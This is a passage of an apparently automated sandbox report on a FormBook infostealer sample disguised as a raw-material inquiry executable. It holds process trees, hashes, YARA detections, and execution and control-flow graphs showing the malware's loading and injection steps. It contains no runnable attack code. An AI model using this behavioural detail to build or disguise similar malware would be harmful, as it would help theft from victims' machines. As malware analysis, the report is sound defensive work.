                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1


                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Click to jump to process

                                                                      Target ID:0
                                                                      Start time:03:38:11
                                                                      Start date:13/01/2025
                                                                      Path:C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\CSZ inquiry for MH raw material.exe"
                                                                      Imagebase:0x220000
                                                                      File size:298'496 bytes
                                                                      MD5 hash:C5C00DAE9E7CDD708EC3FDC5238D1577
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2174886702.00000000010E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2174955869.00000000011C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:03:38:39
                                                                      Start date:13/01/2025
                                                                      Path:C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe"
                                                                      Imagebase:0x580000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4278558823.0000000002AA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:5
                                                                      Start time:03:38:41
                                                                      Start date:13/01/2025
                                                                      Path:C:\Windows\SysWOW64\fc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\fc.exe"
                                                                      Imagebase:0xc0000
                                                                      File size:22'528 bytes
                                                                      MD5 hash:4D5F86B337D0D099E18B14F1428AAEFF
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4277646294.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4278415007.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4278497197.0000000003280000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:6
                                                                      Start time:03:38:54
                                                                      Start date:13/01/2025
                                                                      Path:C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\EvhjnfbNLvgcBIQOCXgUqJUraLVxHRyNYTRVwYxdssmFxbmUktNntHZKuhRQLTjjMcZJKgerMgkgIDU\gGZaaTbTIZmmI.exe"
                                                                      Imagebase:0x580000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:7
                                                                      Start time:03:39:07
                                                                      Start date:13/01/2025
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff6bf500000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Reset < >

                                                                        Execution Graph

                                                                        Execution Coverage:1.1%
                                                                        Dynamic/Decrypted Code Coverage:5.3%
                                                                        Signature Coverage:8.3%
                                                                        Total number of Nodes:133
                                                                        Total number of Limit Nodes:7
                                                                        execution_graph 93011 23aa63 93012 23aad5 93011->93012 93013 23aa7b 93011->93013 93013->93012 93015 23e993 93013->93015 93016 23e9b9 93015->93016 93020 23eab0 93016->93020 93021 24fd43 RtlAllocateHeap RtlFreeHeap 93016->93021 93018 23ea4e 93018->93020 93022 24c193 93018->93022 93020->93012 93021->93018 93023 24c1b0 93022->93023 93026 e02c0a 93023->93026 93024 24c1dc 93024->93020 93027 e02c11 93026->93027 93028 e02c1f LdrInitializeThunk 93026->93028 93027->93024 93028->93024 93029 e02b60 LdrInitializeThunk 93030 23b7c3 93031 23b807 93030->93031 93032 23b828 93031->93032 93034 24cb43 93031->93034 93035 24cb60 93034->93035 93036 24cb71 NtClose 93035->93036 93036->93032 93079 2344f3 93080 23450d 93079->93080 93085 237ca3 93080->93085 93082 23452b 93083 23455f PostThreadMessageW 93082->93083 93084 234570 93082->93084 93083->93084 93086 237cc7 93085->93086 93087 237d03 LdrLoadDll 93086->93087 93088 237cce 93086->93088 93087->93088 93088->93082 93089 250173 93092 24e7b3 93089->93092 93093 24e7d9 93092->93093 93104 227583 93093->93104 93095 24e7ef 93103 24e84b 93095->93103 93107 23b5d3 93095->93107 93097 24e80e 93098 24e823 93097->93098 93122 24cf03 93097->93122 93118 2486d3 93098->93118 93101 24e83d 93102 24cf03 ExitProcess 93101->93102 93102->93103 93125 236953 93104->93125 93106 227590 93106->93095 93108 23b5ff 93107->93108 93136 23b4c3 93108->93136 93111 23b644 93114 23b660 93111->93114 93116 24cb43 NtClose 93111->93116 93112 23b62c 93113 23b637 93112->93113 93115 24cb43 NtClose 93112->93115 93113->93097 93114->93097 93115->93113 93117 23b656 93116->93117 93117->93097 93119 248735 93118->93119 93121 248742 93119->93121 93147 238b13 93119->93147 93121->93101 93123 24cf1d 93122->93123 93124 24cf2a ExitProcess 93123->93124 93124->93098 93126 236970 93125->93126 93128 236989 93126->93128 93129 24d583 93126->93129 93128->93106 93131 24d59d 93129->93131 93130 24d5cc 93130->93128 93131->93130 93132 24c193 LdrInitializeThunk 93131->93132 93133 24d62c 93132->93133 93134 24ec03 RtlFreeHeap 93133->93134 93135 24d645 93134->93135 93135->93128 93137 23b4dd 93136->93137 93141 23b5b9 93136->93141 93142 24c233 93137->93142 93140 24cb43 NtClose 93140->93141 93141->93111 93141->93112 93143 24c250 93142->93143 93146 e035c0 LdrInitializeThunk 93143->93146 93144 23b5ad 93144->93140 93146->93144 93148 238b3d 93147->93148 93154 23903b 93148->93154 93155 234173 93148->93155 93150 238c6a 93151 24ec03 RtlFreeHeap 93150->93151 93150->93154 93152 238c82 93151->93152 93153 24cf03 ExitProcess 93152->93153 93152->93154 93153->93154 93154->93121 93156 234193 93155->93156 93158 2341fc 93156->93158 93160 23b8e3 RtlFreeHeap LdrInitializeThunk 93156->93160 93158->93150 93159 2341f2 93159->93150 93160->93159 93037 24fd03 93040 24ec03 93037->93040 93043 24ceb3 93040->93043 93042 24ec1c 93044 24cecd 93043->93044 93045 24cede RtlFreeHeap 93044->93045 93045->93042 93046 24c143 93047 24c15d 93046->93047 93050 e02df0 LdrInitializeThunk 93047->93050 93048 24c185 93050->93048 93051 2451a3 93053 2451bc 93051->93053 93052 245204 93054 24ec03 RtlFreeHeap 93052->93054 93053->93052 93056 245247 93053->93056 93058 24524c 93053->93058 93055 245214 93054->93055 93057 24ec03 RtlFreeHeap 93056->93057 93057->93058 93059 24fca3 93060 24fcb3 93059->93060 93061 24fcb9 93059->93061 93064 24ece3 93061->93064 93063 24fcdf 93067 24ce63 93064->93067 93066 24ecfe 93066->93063 93068 24ce80 93067->93068 93069 24ce91 RtlAllocateHeap 93068->93069 93069->93066 93161 244e13 93162 244e2f 93161->93162 93163 244e57 93162->93163 93164 244e6b 93162->93164 93165 24cb43 NtClose 93163->93165 93166 24cb43 NtClose 93164->93166 93167 244e60 93165->93167 93168 244e74 93166->93168 93171 24ed23 RtlAllocateHeap 93168->93171 93170 244e7f 93171->93170 93172 239258 93173 24cb43 NtClose 93172->93173 93174 239262 93173->93174 93070 23402f 93071 233fa6 93070->93071 93071->93070 93072 233fb5 93071->93072 93074 24cdd3 93071->93074 93075 24cdf0 93074->93075 93078 e02c70 LdrInitializeThunk 93075->93078 93076 24ce18 93076->93072 93078->93076

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 46 238b13-238b4a call 24eca3 49 238b55-238b87 call 24eca3 call 224b43 call 2447b3 46->49 50 238b50 call 24eca3 46->50 57 239046-23904a 49->57 58 238b8d-238bb7 call 24ec53 49->58 50->49 61 238bc2 58->61 62 238bb9-238bc0 58->62 63 238bc4-238bce 61->63 62->63 64 238bd0 63->64 65 238bef-238c01 call 2447e3 63->65 66 238bd3-238bd6 64->66 72 238c07-238c1f call 24e603 65->72 73 239044-239045 65->73 68 238bd8-238bdb 66->68 69 238bdf-238be9 66->69 68->66 71 238bdd 68->71 69->65 71->65 72->73 76 238c25-238c75 call 234173 72->76 73->57 76->73 79 238c7b-238c9b call 24ec03 76->79 82 238c9d-238c9f 79->82 83 238ccc-238cce 79->83 84 238ca1-238caf call 24e173 call 2270c3 82->84 85 238cd7-238cf9 call 23b673 82->85 83->85 86 238cd0 83->86 93 238cb4-238cb9 84->93 85->73 92 238cff-238d21 call 24c363 85->92 86->85 95 238d26-238d2b 92->95 93->83 96 238cbb-238cca 93->96 95->73 97 238d31-238da7 call 24bd03 call 24bdb3 call 24ec53 95->97 96->97 104 238db0 97->104 105 238da9-238dae 97->105 106 238db2-238de2 104->106 105->106 107 238de8-238dee 106->107 108 238ebe 106->108 109 238df0-238df3 107->109 110 238dfc-238e1d call 24ec53 107->110 111 238ec0 108->111 109->107 112 238df5-238df7 109->112 119 238e29 110->119 120 238e1f-238e27 110->120 113 238ec7-238ecb 111->113 112->111 115 238ed1-238ed5 113->115 116 238ecd-238ecf 113->116 115->113 116->115 118 238ed7-238eeb 116->118 122 238f55-238fa8 call 237c23 * 2 call 24ec23 118->122 123 238eed-238ef2 118->123 121 238e2c-238e41 119->121 120->121 125 238e43 121->125 126 238e54-238e95 call 237ba3 call 24ec53 121->126 153 238faa-238fae 122->153 154 238fcd-238fd2 122->154 124 238ef4-238ef7 123->124 129 238ef9-238efc 124->129 130 238f0e-238f10 124->130 132 238e46-238e49 125->132 149 238e97-238e9c 126->149 150 238e9e 126->150 129->130 136 238efe-238f00 129->136 130->124 138 238f12-238f14 130->138 133 238e52 132->133 134 238e4b-238e4e 132->134 133->126 134->132 139 238e50 134->139 136->130 141 238f02-238f05 136->141 138->122 143 238f16-238f1e 138->143 139->126 141->130 145 238f07 141->145 147 238f23-238f26 143->147 145->130 151 238f28-238f2b 147->151 152 238f4f-238f53 147->152 155 238ea0-238ebc call 2350a3 149->155 150->155 151->152 156 238f2d-238f2f 151->156 152->122 152->147 157 238fb0-238fc1 call 227133 153->157 158 238fda-238fec call 24bf13 153->158 154->158 159 238fd4 154->159 155->111 156->152 161 238f31-238f34 156->161 166 238fc6-238fcb 157->166 168 238ff3-239008 call 23b843 158->168 159->158 161->152 165 238f36-238f4c 161->165 165->152 166->154 166->168 171 23900a-239036 call 237ba3 * 2 call 24cf03 168->171 177 23903b-23903e 171->177 177->73
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                        • Associated: 00000000.00000002.2173646673.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2173763550.0000000000267000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_220000_CSZ inquiry for MH raw material.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "$"
                                                                        • API String ID: 0-3758156766
                                                                        • Opcode ID: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                                        • Instruction ID: 15a0db416e4824c9dac2f592bab4ee1beffcde70e02d783ffd13b3811cc5eecf
                                                                        • Opcode Fuzzy Hash: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
                                                                        • Instruction Fuzzy Hash: 06F192B1D1031AAFDF24DF64CC85AAEB7B9AF44304F1481AAF509AB241DB709E55CF90

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 178 221b91-221b93 179 221b95 178->179 180 221c0c-221c31 178->180 181 221b97-221b9f 179->181 182 221bf9-221c00 179->182 183 221c32-221c3a 180->183 190 221b31 181->190 191 221ba1-221ba2 181->191 182->183 184 221c02-221c05 182->184 188 221bc7-221bcb 183->188 186 221c06-221c0a 184->186 186->180 189 221bcc-221bd9 188->189 201 221b6b-221b7c 189->201 202 221bdb-221bdc 189->202 192 221b33-221b45 190->192 193 221b1c 190->193 191->189 194 221ba4-221bb3 191->194 200 221b49 192->200 196 221aae-221ac1 193->196 197 221b1e-221b1f 193->197 198 221bb6-221bc6 194->198 199 221ac5 196->199 197->200 203 221b21-221b30 197->203 198->188 206 221ac6-221ae3 199->206 207 221a87-221aad 199->207 204 221b80-221b89 200->204 201->204 202->186 205 221bde-221be4 202->205 203->190 209 221b1b 204->209 210 221b8b-221b8c 204->210 205->182 206->199 208 221ae5-221aea 206->208 207->196 212 221af4-221afe 208->212 213 221aec 208->213 209->193 210->198 211 221b8e-221b90 210->211 211->178 216 221b00-221b0d 212->216 217 221af1 212->217 214 221a84-221a85 213->214 215 221aee-221af0 213->215 214->207 215->217 216->209 217->212
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                        • Associated: 00000000.00000002.2173646673.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2173763550.0000000000267000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_220000_CSZ inquiry for MH raw material.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: gfff$qi
                                                                        • API String ID: 0-3408824469
                                                                        • Opcode ID: 2d2d177f7e20a9da04b943f1df5f614a673a51dba6de1cfdd8062a2c1535c526
                                                                        • Instruction ID: 4f1f55554e75f06bed50c360c5c67a3c1bbf9aa1b67253e8e6405f926b12377d
                                                                        • Opcode Fuzzy Hash: 2d2d177f7e20a9da04b943f1df5f614a673a51dba6de1cfdd8062a2c1535c526
                                                                        • Instruction Fuzzy Hash: 99A1D3726242661FD70ACEACEC92AE47F59EB75324F1812BFD851CF1D2E211893687C1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 246 237ca3-237ccc call 24f7e3 249 237cd2-237ce0 call 24fde3 246->249 250 237cce-237cd1 246->250 253 237ce2-237ced call 250083 249->253 254 237cf0-237d01 call 24e283 249->254 253->254 259 237d03-237d17 LdrLoadDll 254->259 260 237d1a-237d1d 254->260 259->260
                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00237D15
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                        • Associated: 00000000.00000002.2173646673.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2173763550.0000000000267000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_220000_CSZ inquiry for MH raw material.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                                        • Instruction ID: 94004075907b7da54d1c967ce4d8063909086b5e364b539ad0ee3beb0acc447d
                                                                        • Opcode Fuzzy Hash: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
                                                                        • Instruction Fuzzy Hash: F2011EB5D1020EABDF14DBA4DD42FEEB778AB54304F0045A6ED0897240F671EB698B91

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 266 24cb43-24cb7f call 224903 call 24dd73 NtClose
                                                                        APIs
                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0024CB7A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                        • Associated: 00000000.00000002.2173646673.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2173763550.0000000000267000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_220000_CSZ inquiry for MH raw material.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Close
                                                                        • String ID:
                                                                        • API String ID: 3535843008-0
                                                                        • Opcode ID: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                                        • Instruction ID: d71054a0784e3139cf7c4a1b6478b9b14e1390854ca97132f85151cd975c9883
                                                                        • Opcode Fuzzy Hash: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
                                                                        • Instruction Fuzzy Hash: F6E04672214654BBD620EA59DC02F9BB76CDFC5710F008555FA58A7242C6B0B9218BE0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 280 e02b60-e02b6c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 4df64cf69048a810585a0a552a4bd3c8dd8d30557e19f9a7f9908ac9f47f850d
                                                                        • Instruction ID: c3a7091a45fb7c0c8e0ae5f662a8cce71c66e8f5e93fdbbac69483a217d8eeca
                                                                        • Opcode Fuzzy Hash: 4df64cf69048a810585a0a552a4bd3c8dd8d30557e19f9a7f9908ac9f47f850d
                                                                        • Instruction Fuzzy Hash: 5190027124240003424571584515656500A8BE1301B95D032E1015590DCA2589D16125

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 281 e02c70-e02c7c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: c84918cd5e92fdbea41d01f16235f38da8c52693a480da0a44daa7d08ac2224a
                                                                        • Instruction ID: 0d5f965c2c3f1d81980e60daa0e4200639b92ce10ba8399751d2bc89ec59b121
                                                                        • Opcode Fuzzy Hash: c84918cd5e92fdbea41d01f16235f38da8c52693a480da0a44daa7d08ac2224a
                                                                        • Instruction Fuzzy Hash: 2B90023124148803D2507158850578A10058BD1301F99D422A4425658D8B9589D17121
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: e8e3dda33dc68d2d32accea7fa972fdbd57dc183cfec48492a889dd98e9b073c
                                                                        • Instruction ID: 2bdcc18379b1e806dc4184914c2db8f3f89cb2e358266859270d6629446826ad
                                                                        • Opcode Fuzzy Hash: e8e3dda33dc68d2d32accea7fa972fdbd57dc183cfec48492a889dd98e9b073c
                                                                        • Instruction Fuzzy Hash: D690023124140413D2517158460574710098BD1341FD5D423A0425558D9B568A92A121
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2174231836.0000000000D90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D90000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_d90000_CSZ inquiry for MH raw material.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 06c54299b35cae112fa5e5baa0914100d848c05f757d2e2bb774902676d78f99
                                                                        • Instruction ID: 6f9710529f60e96f1a2289f3b77c6b012e79931b80ded82cf34907d675a2047f
                                                                        • Opcode Fuzzy Hash: 06c54299b35cae112fa5e5baa0914100d848c05f757d2e2bb774902676d78f99
                                                                        • Instruction Fuzzy Hash: 5E90023164550403D2407158461574620058BD1301FA5D422A0425568D8B958A9165A2

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 0023456A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                        • Associated: 00000000.00000002.2173646673.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2173763550.0000000000267000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_220000_CSZ inquiry for MH raw material.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 17O3k-2I$17O3k-2I
                                                                        • API String ID: 1836367815-2455829943
                                                                        • Opcode ID: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                                        • Instruction ID: a17a64def939567037d58ba30579f144550a80041cf21ef6fcd43877753464fc
                                                                        • Opcode Fuzzy Hash: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
                                                                        • Instruction Fuzzy Hash: AA1127B2D541597ADB10EBE08C81EEE7F7CEF40354F4440A9FA54AB102D3749A168BA1

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 0023456A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                        • Associated: 00000000.00000002.2173646673.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2173763550.0000000000267000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_220000_CSZ inquiry for MH raw material.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: MessagePostThread
                                                                        • String ID: 17O3k-2I$17O3k-2I
                                                                        • API String ID: 1836367815-2455829943
                                                                        • Opcode ID: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                                        • Instruction ID: 4f78381b1e03cc7ed275ba7d4c3059d72460464ae44b57610db86817a453c60c
                                                                        • Opcode Fuzzy Hash: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
                                                                        • Instruction Fuzzy Hash: 2401D2B2D0025C7AEB10BBE48C82DEF7B7CDF41794F058065FA14A7101D6649E168BA1

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 41 24ceb3-24cef4 call 224903 call 24dd73 RtlFreeHeap
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0024CEEF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                        • Associated: 00000000.00000002.2173646673.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2173763550.0000000000267000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_220000_CSZ inquiry for MH raw material.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: i#
                                                                        • API String ID: 3298025750-4066981120
                                                                        • Opcode ID: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                                        • Instruction ID: 59f96256967027ffeaa4f1781855963c4cec4174812ea5e524083010351a351d
                                                                        • Opcode Fuzzy Hash: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
                                                                        • Instruction Fuzzy Hash: 2DE06DB2604604BBD614EE98EC41F9B37ACEFC8710F004018F918A7242C7B1B9218BB4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 261 24ce63-24cea7 call 224903 call 24dd73 RtlAllocateHeap
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,0023EA4E,?,?,00000000,?,0023EA4E,?,?,?), ref: 0024CEA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                        • Associated: 00000000.00000002.2173646673.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2173763550.0000000000267000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_220000_CSZ inquiry for MH raw material.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                                        • Instruction ID: 994c156c7f32bc15fa55e0c53fc68133d9deda33480c41986dec3a2e7eacf7a6
                                                                        • Opcode Fuzzy Hash: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
                                                                        • Instruction Fuzzy Hash: EEE06DB2614244BBD614EE98DC42EAB77ACEF88710F004059FA08A7242C7B0B920CAB4

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 271 24cf03-24cf38 call 224903 call 24dd73 ExitProcess
                                                                        APIs
                                                                        • ExitProcess.KERNEL32(?,00000000,00000000,?,004D1854,?,?,004D1854), ref: 0024CF33
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2173707724.0000000000221000.00000040.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true
                                                                        • Associated: 00000000.00000002.2173646673.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2173763550.0000000000267000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_220000_CSZ inquiry for MH raw material.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ExitProcess
                                                                        • String ID:
                                                                        • API String ID: 621844428-0
                                                                        • Opcode ID: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
